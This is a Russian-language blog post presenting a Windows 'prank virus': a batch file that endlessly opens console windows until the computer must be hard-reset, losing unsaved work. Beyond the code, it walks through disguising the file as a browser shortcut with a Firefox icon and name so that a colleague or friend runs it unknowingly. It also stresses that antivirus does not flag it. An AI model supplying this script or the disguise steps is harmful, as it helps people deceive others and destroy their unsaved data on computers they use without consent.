Вирус Ошибка консоли команд.

Напишем вирус Ошибка консоли команд.

Всем привет, и это очередной прикол от сайта К76 для операционной системы Windows 7. Сегодня я покажу очередную неприятную штуку, с помощью которой можно наказать противника или пошутить над коллегами или друзьями. Предупреждаю сразу – по действию напоминает откровенный вирус, так как после его запуска ничего другого не останется, как перезагрузить компьютер или ноутбук кнопкой на лицевой панели (или кнопкой выключения). Если будете пробовать или испытывать на себе, сначала закройте все приложения и сохраните важные данные, после перезагрузки они будут утеряны. Выглядит Ошибка консоли команд как бесконечно повторяющиеся окна консоли команд на Рабочем столе. Однако, как впрочем и всегда на моих страницах, это простой батник, который не определяется вирусом.

Ошибка консоли команд

Итак, нам как всегда понадобится открыть утилиту Блокнота и записать туда вот такой код:

@echo off
color a
cls
:top
start
goto top

Теперь сохраним его под любым названием под расширением .bat. Например, прикол.bat.Ошибка консоли команд

Теперь наша задача подсунуть этот файл под видом часто используемой программы жертве. Или просто подождать своего часа. Первое, что приходит на ум – это браузер. То есть, нажав на этот файл, жертва должна думать, что запустила другую программу, например, выходит в интернет. Давайте подсунем его.

  • Спрячем наш файл куда подальше. Например, в папку Мои документы или просто в диск С.
  • Создадим для него ярлык правой кнопкой мыши.
  • Измените значок ярлыка. Ошибка консоли команд 2
  • Правой мышкой – Свойства – Сменить значок. Пропустите ошибку и попадёте в папку с ярлыками. Можете выбрать любой из них, но я бы порекомендовал поискать ярлык в папке любимой программы коллеги. Я залез в папку браузера Mozilla и нашёл там её ярлык.

Ошибка консоли команд 3

Выбрал значок огненной лисы – ОК – Применить – ОКОстаётся переименовать ярлык и назвать его именем браузера. Если жертва пользуется панелью быстрого запуска, перетащите значок и туда. Это ускорит час Х.Ошибка консоли команд 4

Успехов

Читайте ещё про компьютерные приколы на сайте Компьютер76

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Максимальный размер загружаемого файла: 50 МБ. Вы можете загрузить: изображение, видео. Ссылки на YouTube, Facebook, Twitter и другие сервисы, вставленные в текст комментария, будут автоматически встроены. Перетащите файлы сюда